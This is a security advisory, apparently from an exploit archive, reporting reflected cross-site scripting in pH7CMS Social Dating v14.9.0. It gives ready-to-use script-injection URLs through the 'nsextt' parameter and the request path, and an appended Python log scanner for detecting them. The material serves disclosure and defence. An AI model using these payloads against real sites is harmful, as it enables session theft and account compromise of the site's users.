===========================================================================================
# Exploit Title: PH7CMS Social Dating 'nsextt' XSS Inj.
# Dork: N/A
# Date: 11-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://ph7cms.com/
# Software Link: https://sourceforge.net/projects/ph7socialdating/files/
# Version: v14.9.0
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: pH7CMS is a Professional, Free & Open Source PHP Social Dating Builder Software (primarily designed for Webmasters and Developers ...).
===========================================================================================
# POC - XSS
# Parameters : nsextt
# Attack Pattern : '"--></style></scRipt><scRipt>alert(0x000CCB)</scRipt>
# GET Method : http://localhost/pH7Builder1490/?l=en_US&nsextt='"--></style></scRipt><scRipt>alert(0x000CCB)</scRipt>
# GET Method : http://localhost/pH7Builder1490/?nsextt='"--></style></scRipt><scRipt>alert(0x0000A8)</scRipt>
# GET Method : http://localhost/pH7Builder1490/lang/?nsextt='"--></style></scRipt><scRipt>alert(0x0007AD)</scRipt>
# GET Method : http://localhost/pH7Builder1490/rss/blog?nsextt='"--></style></scRipt><scRipt>alert(0x001216)</scRipt>
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: PH7CMS Social Dating Multiple XSS Inj.
# Dork: N/A
# Date: 11-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://ph7cms.com/
# Software Link: https://sourceforge.net/projects/ph7socialdating/files/
# Version: v14.9.0
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: pH7CMS is a Professional, Free & Open Source PHP Social Dating Builder Software (primarily designed for Webmasters and Developers ...).
===========================================================================================
# POC - XSS
# Parameters : Full URL
# Attack Pattern : '"--></style></scRipt><scRipt>alert(0x000CCB)</scRipt>
# GET Method : http://localhost/pH7Builder1490/lang/'"--></style></scRipt><scRipt>alert(0x000A37)</scRipt>
# GET Method : http://localhost/pH7Builder1490/rss/'"--></style></scRipt><scRipt>alert(0x001228)</scRipt>
# GET Method : http://localhost/pH7Builder1490/rss/blog'"--></style></scRipt><scRipt>alert(0x001220)</scRipt>
# GET Method : http://localhost/pH7Builder1490/rss/comment-note'"--></style></scRipt><scRipt>alert(0x00132F)</scRipt>
# GET Method : http://localhost/pH7Builder1490/rss/comment-profile'"--></style></scRipt><scRipt>alert(0x0012B8)</scRipt>
# GET Method : http://localhost/pH7Builder1490/rss/forum-topic'"--></style></scRipt><scRipt>alert(0x0012B9)</scRipt>
# GET Method : http://localhost/pH7Builder1490/rss/note'"--></style></scRipt><scRipt>alert(0x0012B1)</scRipt>
# GET Method : http://localhost/pH7Builder1490/site-map-xml/'"--></style></scRipt><scRipt>alert(0x00121D)</scRipt>
# GET Method : http://localhost/pH7Builder1490/rss/comment-blog'"--></style></scRipt><scRipt>alert(0x001330)</scRipt>
# GET Method : http://localhost/pH7Builder1490/rss/comment-video'"--></style></scRipt><scRipt>alert(0x001539)</scRipt>
# GET Method : http://localhost/pH7Builder1490/rss/comment-picture'"--></style></scRipt><scRipt>alert(0x001615)</scRipt>
# GET Method : http://localhost/pH7Builder1490/rss/comment-game'"--></style></scRipt><scRipt>alert(0x00161A)</scRipt>
# GET Method : http://localhost/pH7Builder1490/forgot/'"--></style></scRipt><scRipt>alert(0x001701)</scRipt>
===========================================================================================
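Added example, not part of the original advisory: an access-log check for requests shaped like the ones listed in both PoC sections. It percent-decodes the URL path and each query value (repeatedly, to cover double encoding) and matches tag openers case-insensitively, so the mixed-case `scRipt` form is still caught. The log lines are constructed samples in Apache combined-log style, and the function names are hypothetical.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines (Apache combined-log style), not taken from a real server.
SAMPLE_LOG = [
    '127.0.0.1 - - [11/Mar/2019:10:00:00 +0000] "GET /pH7Builder1490/?l=en_US&nsextt='
    '%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x000CCB)%3C/scRipt%3E HTTP/1.1" 200 5120',
    '127.0.0.1 - - [11/Mar/2019:10:00:05 +0000] "GET /pH7Builder1490/rss/blog'
    '%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x001220)%3C/scRipt%3E HTTP/1.1" 200 812',
    '127.0.0.1 - - [11/Mar/2019:10:00:09 +0000] "GET /pH7Builder1490/rss/blog?l=en_US HTTP/1.1" 200 4096',
]

REQUEST = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Tag opener/closer or comment terminator; IGNORECASE covers mixed-case "scRipt".
MARKUP = re.compile(r"<\s*/?\s*[a-z]|-->", re.IGNORECASE)

def fully_decode(value, rounds=3):
    """Percent-decode up to `rounds` times so double-encoded input is normalised."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_line(line):
    """Return (location, decoded value) findings for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    # Split by hand: the path itself is attacker-controlled in the second PoC set.
    path, _, query = m.group("target").partition("?")
    findings = []
    path = fully_decode(path)
    if MARKUP.search(path):
        findings.append(("path", path))
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        value = fully_decode(value)
        if MARKUP.search(value):
            findings.append(("param:" + fully_decode(name), value))
    return findings

def scan_log(lines):
    """Return (line number, location) for every finding in the log."""
    return [(n, loc) for n, line in enumerate(lines, 1) for loc, _ in scan_line(line)]

if __name__ == "__main__":
    for n, loc in scan_log(SAMPLE_LOG):
        print(f"line {n}: markup in {loc}")
```

A hit only shows that markup was sent in the request; whether it was reflected unencoded still has to be confirmed against the response or the template that echoes the URL.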